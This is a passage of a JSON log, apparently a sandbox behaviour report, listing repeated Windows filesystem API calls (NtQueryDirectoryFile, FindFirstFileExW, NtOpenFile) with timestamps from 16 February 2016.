"NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,259", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,259", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,259", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,259", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,259", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,259", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,259", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,259", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,259", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,259", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,259", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,259", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,259", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,259", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,259", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,269", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,269", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,269", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,269", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,269", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:41:39,269", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,269", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,269", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,269", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,269", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,269", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,269", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,269", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,269", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,269", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,269", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,269", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,269", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,269", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,269", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,269", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,269", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,269", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,269", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,269", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,269", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:41:39,269", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,269", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,269", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,269", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,269", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,269", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,269", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,269", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,269", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,269", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,269", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,269", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,279", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,289", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,289", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,289", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,289", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,289", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,289", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,289", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,289", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": 
"2016-02-16 17:41:39,289", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,289", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,289", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,289", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,289", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,289", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,289", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,289", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,289", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,289", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,289", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,289", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,289", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,289", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,289", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,289", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,289", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,289", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,289", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,289", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,289", "api": "NtQueryDirectoryFile"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:41:39,289", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,289", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,299", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,299", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,299", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,299", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,299", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,309", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,309", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,309", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,309", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,309", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,309", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,309", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,309", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,309", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,309", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,309", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,309", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,309", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,309", "api": 
"NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,309", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,309", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,309", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,309", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,309", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,309", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,309", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,309", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,309", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,309", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,309", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,309", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,309", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,309", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,309", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,309", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,309", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,309", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,309", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,319", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,319", "api": 
"NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,319", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,319", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,319", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,319", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,319", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,319", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,319", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,319", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,319", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,319", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,319", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,319", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,319", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,319", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,319", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,319", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,319", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,319", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,319", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,319", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:41:39,319", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,319", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,319", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,319", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,319", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,319", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,319", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,319", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,319", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,319", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,319", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,319", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,319", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,319", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,329", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,329", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,329", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,329", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,329", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,329", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,329", "api": "FindFirstFileExW"}, {"category": "filesystem", 
"timestamp": "2016-02-16 17:41:39,329", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,329", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,329", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,329", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,329", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,329", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,329", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,329", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,329", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,329", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,329", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,329", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,329", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,329", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,329", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,329", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,329", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,359", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,369", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,369", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,369", "api": "NtQueryDirectoryFile"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:41:39,369", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,369", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,369", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,369", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,369", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,369", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,369", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,369", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,369", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,369", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,369", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,369", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,369", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,369", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,369", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,369", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,369", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,369", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,369", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,369", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,369", "api": 
"NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,379", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,379", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,379", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,379", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,379", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,379", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,379", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,379", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,379", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,379", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,379", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,379", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,379", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,379", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,389", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,389", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,389", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,389", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,389", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,389", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:41:39,389", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,389", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,389", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,389", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,389", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,389", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,389", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,399", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,399", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,399", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,399", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,399", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,409", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,409", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,409", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,409", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,419", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,419", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,419", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,419", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,419", "api": 
"FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,419", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,419", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,419", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,419", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,419", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,419", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,419", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,419", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,419", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,419", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,419", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,419", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,419", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,419", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,419", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,419", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,419", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,429", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,429", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,429", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:41:39,429", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,429", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,429", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,429", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,429", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,429", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,429", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,429", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,429", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,429", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,429", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,429", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,429", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,429", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,429", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,429", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,429", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,429", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,429", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,429", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,429", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": 
"2016-02-16 17:41:39,429", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,429", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,429", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,429", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,429", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,429", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,429", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,429", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,429", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,429", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,429", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,429", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,429", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": 